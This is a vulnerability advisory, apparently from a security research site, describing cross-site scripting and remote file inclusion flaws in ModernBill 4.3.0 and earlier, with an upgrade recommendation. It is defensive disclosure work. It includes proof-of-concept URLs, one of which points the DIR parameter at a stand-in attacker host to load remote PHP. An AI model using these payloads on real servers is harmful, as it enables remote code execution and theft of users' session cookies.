Search | Research | Contact Us Sunday April 9, 2022
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 Multiple Invision Power Board Vulnerabilities
  3 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  4 eBay And Amazon Still Vulnerable
  5 When Small Mistakes Can Cause Big Problems
  6 Woltlab Burning Board SQL Injection Vulnerability
  7 Multiple Vulnerabilities In phpWebsite
  8 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
  9 Document Object Model Hijacking Explained
10 Critical Vulnerability In Help Center Live
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Multiple ModernBill 4.3.0 And Earlier Vulnerabilities
April 10, 2022
Vendor : ModernGigabyte, LLC
URL : http://www.modernbill.com/
Version : ModernBill 4.3.0 && Earlier
Risk : Multiple Vulnerabilities


Description:
ModernBill is a widely used billing and management software used by webhosts to manage billing and financial data. ModernBill is prone to remote file inclusion and cross site scripting in version prior to 4.3.1. A fixed version is available and users are advised to upgrade immediately.


Cross Site Scripting:
The ModernBill order forms are prone to multiple cross site scripting issues. Below are a few examples of this particular issue.

http://example.com/order/orderwiz.php?v=1&aid;=&c;_code=[XSS] http://example.com/order/orderwiz.php?v=1&aid;=[XSS]

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the root ModernBill directory. This directory contains several files to help users learn how to customize ModernBill to specifically fit their needs. One of the scripts included in this directory is vulnerable to a very dangerous remote file include vulnerability. Lets have a look at the file "news.php"
// ~~~~~~~~~~~~~~~~~
// DO NOT EDIT START
// ~~~~~~~~~~~~~~~~~
include_once($DIR."include/functions.inc.php");
If globals are set to on, and no include restrictions are in effect then we can include any php code of our choice remotely. Of course the webserver hosting the malicious file to be included could not have php enabled, or the file would be parsed before it reached the victim server.

http://example.com/samples/news.php?DIR=http://attacker/

This issue is very dangerous when present, but regardless of your server configuration you are still encouraged to upgrade immediately.


Solution:
A fix for the mentioned issues has been available for quite some time now and users should upgrade thier ModernBill installations.


Credits:
James Bercegay of the GulfTech Security Research Team